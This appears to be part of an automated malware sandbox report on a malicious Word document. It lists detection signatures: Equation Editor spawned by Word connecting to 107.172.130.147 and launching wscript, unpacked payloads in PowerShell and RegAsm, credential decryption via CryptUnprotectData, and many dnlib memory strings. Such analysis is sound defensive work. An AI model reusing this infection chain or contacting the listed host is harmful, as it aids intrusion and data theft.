                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_004338C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404423 FreeLibrary,CryptUnprotectData,11_2_00404423
                    Source: powershell.exe, 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_938781f2-a

                    Exploits

                    barindex
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTR
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.172.130.147 Port: 80Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407538 _wcslen,CoGetObject,9_2_00407538
                    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49162 version: TLS 1.0
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.369629147.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.369396970.0000000000279000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.369629147.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.369396970.0000000000279000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.373390502.00000000063C0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000004459000.00000004.00000800.00020000.00000000.sdmp
